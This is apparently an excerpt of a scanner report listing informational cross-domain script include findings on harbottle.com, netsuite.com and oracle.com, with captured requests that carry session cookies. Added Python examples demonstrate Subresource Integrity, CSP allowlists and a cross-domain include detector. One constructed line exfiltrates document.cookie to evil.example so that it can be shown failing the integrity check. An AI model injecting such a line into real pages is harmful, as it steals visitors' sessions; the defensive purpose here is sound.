Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/newsletters/rugby3.jpg

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/rugby3.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.132. http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/newsletters/sjones.jpg

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/sjones.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.133. http://www.harbottle.com/hnl/pix/square.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/square.gif

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/square.gif HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.134. http://www.harbottle.com/hnl/pix/square_FF9933.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pix/square_FF9933.gif

Issue detail

The response is a 404 error page, and that page dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/square_FF9933.gif HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.135. http://www.netsuite.com/portal/home.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/home.shtml

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/home.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 76984
Content-Disposition: inline;filename="home.shtml"
NS_RTIMER_COMPOSITE: -2028607536:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.136. http://www.netsuite.com/portal/products/netsuite/financials/main.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/products/netsuite/financials/main.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/products/netsuite/financials/main.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 46194
Content-Disposition: inline;filename="main.shtml"
NS_RTIMER_COMPOSITE: -804654991:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<!-- Google Analytics code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.137. http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/products/netsuite/revenue/main.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/products/netsuite/revenue/main.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; bn_u=6923713758307492964; mbox=session#1315341135013-154927#1315343714|PC#1315341135013-154927.19#1316551454|check#true#1315341914; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.3.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713758307492964; __utma=19239463.762044252.1315341857.1315341857.1315341857.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1315341857.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22t%22%3A1315341860009%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Frevenue%2Fmain.shtml%22%2C%22l%22%3A%22Recurring%20Revenue%20Management%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20%231%20integrated%2C%20SaaS%20ERP%20(Enterprise%20Resource%20Planning)%20software%20for%20growing%20businesses.%20Run%20your%20entire%20business%20in%20real-time%20from%20front%20to%20back%20office%20with%20one%20seamlessly%20integrated%20system%20that%20includes%20accounting%20%2F%20ERP%2C%20CRM%2C%20and%20Ecommerce.%22%2C%22ti%22%3A%22NetSuite%20Financials%22%2C%22nw%22%3A877%2C%22nl%22%3A229%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 39464
Content-Disposition: inline;filename="main.shtml"
NS_RTIMER_COMPOSITE: -2027146723:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:44:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<!-- Google Analytics code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.138. http://www.oracle.com/ao/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /ao/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/us/assets/metrics/ora_ocom.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /ao/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41185998748378867,0:1)
Date: Tue, 06 Sep 2011 16:16:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.139. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186041698052273,0:1)
Date: Tue, 06 Sep 2011 16:16:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
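
The scanner rates these entries as informational, which is correct for a scanner: nothing is exploitable until one of the three hosts above, or someone on the path of a plain-http fetch, serves different bytes. When that happens the script runs with the page's origin, and the page has no say. The browser-side controls that contain this are Subresource Integrity, which pins a script to a hash so a changed copy is refused rather than executed, and a Content-Security-Policy `script-src` allowlist, which limits the origins that may supply script at all. The following is an added example, not taken from the report or from any of the sites it names; the script body, the tampered payload and the host names are constructed for the example.

```python
"""Added example, not from the scan report or from the sites it names: the
browser-side controls that contain a cross-domain script include.

Subresource Integrity pins a script to a hash, so a changed copy (compromised
third party, or an on-path attacker on a plain-http fetch) is refused rather
than run. A Content-Security-Policy script-src allowlist limits which origins
may supply script at all. Script body and URLs below are constructed."""
import base64
import hashlib
import re
from urllib.parse import urlsplit, urlunsplit

SRI_ALGS = ("sha256", "sha384", "sha512")


def sri_hash(body, alg="sha384"):
    """integrity= value for a script body: '<alg>-<base64 digest>'."""
    if alg not in SRI_ALGS:
        raise ValueError("SRI allows sha256, sha384 or sha512 only")
    return f"{alg}-{base64.b64encode(hashlib.new(alg, body).digest()).decode('ascii')}"


def pinned_script_tag(url, body):
    """<script> tag the browser will only execute if the fetched body still
    hashes to `body`. crossorigin="anonymous" is mandatory for SRI on a
    cross-origin URL, and the third party has to serve CORS headers or the
    browser blocks the script outright."""
    p = urlsplit(url)
    # Force https: SRI stops tampering, but plain http still lets a network
    # observer see which third parties the user is talking to.
    url = urlunsplit(("https", p.netloc, p.path, p.query, p.fragment))
    return f'<script src="{url}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def verify_sri(body, integrity):
    """Browser-side check: the body is accepted if any listed hash matches."""
    for token in integrity.split():
        alg = token.partition("-")[0]
        if alg in SRI_ALGS and sri_hash(body, alg) == token:
            return True
    return False


def csp_script_src(script_urls):
    """Content-Security-Policy value allowing 'self' plus exactly the given
    script origins, upgraded to https, duplicates removed, order kept."""
    origins = []
    for u in script_urls:
        o = f"https://{urlsplit(u).hostname}"
        if o not in origins:
            origins.append(o)
    return "script-src 'self' " + " ".join(origins)


# Constructed stand-in for the third-party script body; the real urchin.js is
# far larger and changes without notice, which is why SRI on a vendor-hosted
# tracker needs a process for re-pinning whenever the vendor ships an update.
SAMPLE_URL = "http://www.google-analytics.com/urchin.js"
SAMPLE_BODY = b"var _uacct = 'UA-0000000-1';\nfunction urchinTracker() {}\n"

if __name__ == "__main__":
    tag = pinned_script_tag(SAMPLE_URL, SAMPLE_BODY)
    print(tag)
    integrity = re.search(r'integrity="([^"]+)"', tag).group(1)
    print("original body accepted:", verify_sri(SAMPLE_BODY, integrity))
    # Constructed tampering: a cookie-stealing line appended to the vendor script.
    tampered = SAMPLE_BODY + b"new Image().src='https://evil.example/?c='+document.cookie;\n"
    print("tampered body accepted:", verify_sri(tampered, integrity))
    print("Content-Security-Policy:",
          csp_script_src([SAMPLE_URL, "http://www.googleadservices.com/pagead/conversion.js"]))
```

The two controls fail in different ways, which is why both are used: SRI does nothing for a script tag an attacker injects (they choose the hash), and CSP does nothing when an allowlisted host is itself compromised. For a vendor script that is updated in place, such as a tracker, the hash will break the include on the vendor's next release; self-hosting a reviewed copy is the usual way to keep SRI workable.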

20.140. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763838760381153,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.141. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/brunei-316198-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=36013329115639045,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.142. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41170936298073964,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
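
Every finding in this section is the same check: the scanner compares the host of each external `<script src>` against the host of the page and reports any that differ. The script below reproduces that check over a raw response so the list can be regenerated for a finding whose detail list is missing. It is an added example, not part of the report and not the scanner's own code; the sample response body is constructed from the script tags visible in the snippets above (the real bodies are over 100 KB), and the helper names are mine. Beyond the plain "other domain" test, it also records whether each include is fetched over plain http, which is the caveat a practitioner wants here: every third-party script on these http pages is loaded unauthenticated, so an on-path attacker can replace it, and a hostname comparison also flags first-party-owned CDNs (www.oracleimg.com differs from www.oracle.com), so the output still needs triage.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a trimmed stand-in for the snipped oracle.com responses above.
# Hosts are copied from the visible <script src> tags; the body is not a real capture.
SAMPLE_PAGE_URL = "http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><head>\n"
    '<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>\n'
    '<script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript"></script>\n'
    '<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>\n'
    '<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>\n'
    '<script type="text/javascript" src="/us/assets/local.js"></script>\n'
    '<script type="text/javascript">var inline = 1;</script>\n'
    "</head><body></body></html>\n"
)


def body_of(raw_response):
    """Strip the status line and headers from a raw HTTP response (CRLF or LF)."""
    for sep in ("\r\n\r\n", "\n\n"):
        if sep in raw_response:
            return raw_response.split(sep, 1)[1]
    return raw_response


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def cross_domain_scripts(page_url, html_body):
    """Return one dict per script whose host differs from the page's host.

    Relative and protocol-relative srcs are resolved against the page URL first,
    so a same-host include written as "/path.js" is correctly left out.
    'plaintext' is True when the script is fetched over http (no integrity or
    origin authentication at all, whatever the page's own scheme).
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = ScriptSrcCollector()
    collector.feed(html_body)
    findings = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        host = (parts.hostname or "").lower()
        if not host or host == page_host:
            continue  # same host: not a cross-domain include
        findings.append({
            "url": absolute,
            "host": host,
            "plaintext": parts.scheme.lower() == "http",
        })
    return findings


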